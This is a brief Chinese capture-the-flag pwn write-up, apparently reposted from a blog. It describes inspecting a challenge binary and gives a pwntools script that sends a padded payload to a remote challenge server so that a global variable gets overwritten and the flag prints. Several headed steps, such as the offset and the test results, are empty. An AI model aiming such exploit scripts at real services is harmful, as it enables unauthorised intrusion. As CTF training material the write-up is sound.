题目分析
下载文件后首先使用checksec检查文件保护机制
使用ida查看伪代码
思路明确,让dword_60106C == 1853186401即可输出flag
信息收集
偏移量
sub_400686函数地址
编写脚本
from pwn import *
p = remote(‘111.198.29.45‘,36884)
#p = process("./pwn002")
payload = "A"*4 + p64(1853186401)
p.sendline(payload)
p.interactive()
本地测试
靶机测试
原文地址:https://www.cnblogs.com/anweilx/p/12628439.html
时间: 2024-07-31 16:50:32